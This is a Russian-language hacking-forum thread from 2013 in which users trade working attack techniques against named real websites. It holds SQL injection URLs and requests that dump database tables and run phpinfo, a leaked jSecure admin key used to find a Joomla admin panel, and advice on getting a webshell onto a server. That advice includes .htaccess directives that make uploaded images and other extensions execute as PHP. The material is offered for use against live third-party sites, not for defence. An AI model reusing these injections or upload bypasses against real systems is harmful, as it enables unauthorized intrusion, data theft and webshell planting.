Старый 09.01.2013, 20:30   #2621
beastie
 
Регистрация: 31.12.2012
Сообщений: 4
Репутация: 0
По умолчанию

m0Hze ничего не помогло.
Однако в шаблоне присутствовал хтмл код + вставки {~php code~}, вставив <script language="php">phpinfo();</script> на ура отработало. Так что спасибо, вопрос решен.
beastie вне форума   Ответить с цитированием
Старый 10.01.2013, 16:06   #2622
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от DrakonHaSh Посмотреть сообщение
возможно дело в "кривом" способе редактирования запроса (расширение к браузеру или еще какая нибудь кривоватая хрень).

burp free 1.5 , Repeater
Код:
GET /catalog/list/250'and(0)union(select(id),idfirm,iduser,bancat,bannersarea,'php',startdate,stopdate,active,graph_name,graph_opis,graph_alt,graph_img,flash_name,flash_opis,flash_razm,flash_file,php_name,php_opis,'phpinfo();',js_name,js_opis,js_code,url,(graph_down)from(fho_banners)where(id)=19811)# HTTP/1.1
Host: www.1md.ru


=>
PHP Version 5.3.2
FreeBSD aut.su 8.0-STABLE-201004 FreeBSD 8.0-STABLE-201004 #0: Mon Apr  5 15:59:06 UTC 2010     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

получилось вывести phpinfo() при помощи прокси-сервера Fiddler Web Debugger (v2.4.2.4)
твою прогу еще не изучил, с настройками разбираюсь и обязательно ее потом оценим
Flakt вне форума   Ответить с цитированием
Старый 12.01.2013, 16:07   #2623
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Раскручиваю скуль в Joomla. Проблема, не найду админку, редирект на главную страницу
Прочитал этот пост https://rdot.org/forum/showpost.php?p=29255&postcount=29 и ничего не понял, где же искать админку. вывел все колонки и путь к ней там не прописан

_http://www.wonted.co.za/index.php?option=com_events&view=event&Itemid=18&i d=-64'+union+select+1,2,3,4,5,6,(select(@x)from(selec t(@x:=0x00),(select(0)from(jos_plugins)where(0x00) in(@x:=concat(@x,0x3c62723e,id,0x3a,name,0x3a,elem ent,0x3a,folder,0x3a,access,0x3a,ordering,0x3a,pub lished,0x3a,iscore,0x3a,client_id,0x3a,checked_out ,0x3a,checked_out_time,0x3a,params))))x),8,9,10,11 ,12,13,14+from+jos_plugins%23

Последний раз редактировалось Flakt; 12.01.2013 в 16:09..
Flakt вне форума   Ответить с цитированием
Старый 12.01.2013, 16:22   #2624
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Лол, автор jSecure до сих пор хранит ключ в чистом виде в БД.
Цитата:
54:System - jSecure Authentication:jsecure:system:0:0:1:0:0:0:0000-00-00 00:00:00:key=wontedsecureadmin options=0 custom_path=plugins/system/404.html
Цитата:
/administrator/?key
Untitled вне форума   Ответить с цитированием
Старый 12.01.2013, 16:26   #2625
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от Untitled Посмотреть сообщение
Лол, автор jSecure до сих пор хранит ключ в чистом виде в БД.
_http://www.wonted.co.za/administrator/wontedsecureadmin

нет там админки

Not Found

The requested URL /administrator/wontedsecureadmin was not found on this server.
Flakt вне форума   Ответить с цитированием
Старый 12.01.2013, 16:28   #2626
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Знак вопроса забыл поставить
Pashkela вне форума   Ответить с цитированием
Старый 12.01.2013, 16:30   #2627
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
Знак вопроса забыл поставить
Точно, спасибо за помощь Лоханулся немного, с кем не бывает
Flakt вне форума   Ответить с цитированием
Старый 12.01.2013, 23:11   #2628
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Есть: инъекция; фтп доступ к каталогу, не видимому через веб; доступ в админку, без возможности заливки шелла, но с возможностью правки html через wysiwyg редактор.
Нет: вывода ошибок (не известен абсолютный путь к сайту).
Как можно получить полноценный вебшелл?
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 13.01.2013, 14:08   #2629
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Еще один вопрос: есть возможность заливки произвольного файла в папку. Заливаю php - при обращении имею Forbidden. При заливке php3, phtml и т.п. - файл предлагается к закачке. Заливаю .htaccess (пустой; с директивами addtype application/x-httpd-php .kkk или addhandler application/x-httpd-php .kkk), но скрипт с расширением kkk отдается как текстовый. В остальном ничего не меняется.
htaccess заливается нормально, есть корявая читалка локальных файлов. В корневом htaccess нет директив для запрета php и/или каких-то расширений.
Разные регистры пробовал (shell.php - Forbidden, shell.pHp - скачивается).
Пробовал разные варианты с директивами htaccess, типа
AddHandler application/x-httpd-php5
AddHandler x-httpd-php
SetHandler application/x-httpd-php5
Поведение скриптов не меняется.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 13.01.2013, 14:21   #2630
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
Заливаю .htaccess (пустой; с директивами addtype application/x-httpd-php .kkk или addhandler application/x-httpd-php .kkk), но скрипт с расширением kkk отдается как текстовый. В остальном ничего не меняется.
htaccess заливается нормально, есть корявая читалка локальных файлов. В корневом htaccess нет директив для запрета php и/или каких-то расширений.
Разные регистры пробовал (shell.php - Forbidden, shell.pHp - скачивается).
Пробовал разные варианты с директивами htaccess, типа
AddHandler application/x-httpd-php5
AddHandler x-httpd-php
SetHandler application/x-httpd-php5
Поведение скриптов не меняется.
Попрообуй
Код:
php_flag engine on
addhandler application/x-httpd-php html phtml jpg gif kkk
nikp вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot